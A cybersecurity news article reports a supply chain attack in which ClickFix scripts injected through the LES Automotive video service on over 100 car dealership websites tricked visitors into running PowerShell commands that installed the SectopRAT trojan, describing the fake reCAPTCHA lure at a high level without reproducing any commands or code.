A recent supply chain attack compromised over 100 car dealerships websites after cybercriminals infiltrated a third-party domain, embedding malicious ClickFix code.
The breach targeted LES Automotive, a shared video service widely used by car dealerships. Cybercriminals injected ClickFix malware, redirecting visitors to a deceptive webpage designed to manipulate them into executing harmful commands.
How the ClickFix Attack Works
ClickFix operates by embedding malicious scripts into a website. These scripts generate fake prompts asking users to fix an error or complete a reCAPTCHA challenge to verify their identity.
Once the user clicks on the prompt, a malicious command is copied to the clipboard. Which then instructs them to open the Windows Run prompt, paste the command, and execute it—unknowingly infecting their device.
This social engineering technique has been active for several years but gained popularity among cybercriminals and Advanced Persistent Threats. Security experts have observed a significant surge in its adoption recently.
In October 2024, the U.S. Department of Health and Human Services (HHS) warned that Russian-speaking cybercriminals had been leveraging ClickFix since at least April 2024. Meanwhile, these attackers actively distributed information stealers and other malware variants across multiple industries.
Most recently, Microsoft raised alarms over a ClickFix malware campaign targeting the hospitality sector.
SectopRAT Deployment via Car Dealerships Websites
Cybersecurity researcher Randy McEoin uncovered that more than 100 auto dealership websites using LES Automotive were infected with ClickFix. The aim was deeploying SectopRAT malware to unsuspecting visitors.
The attack utilized a fake reCAPTCHA interface, tricking users into running PowerShell commands that installed the remote access trojan (RAT). This allowed hackers to gain full control over infected systems, posing a severe cybersecurity risk.
McEoin’s analysis revealed that the JavaScript responsible for the attack contained Russian-language comments—a potential clue about the origins of the threat actors behind this campaign.
Additionally, evidence suggests that the malware was injected dynamically, which means that some users received a harmless version of the script, while others were served the malicious payload.
This incident underscores the escalating risks of supply chain attacks, where a single compromised vendor can expose hundreds of businesses and thousands of users to cyber threats.
As cybercriminals refine their tactics, businesses must adopt stronger security measures, including regular software audits, network monitoring, and enhanced user awareness to mitigate risks associated with these sophisticated attacks.
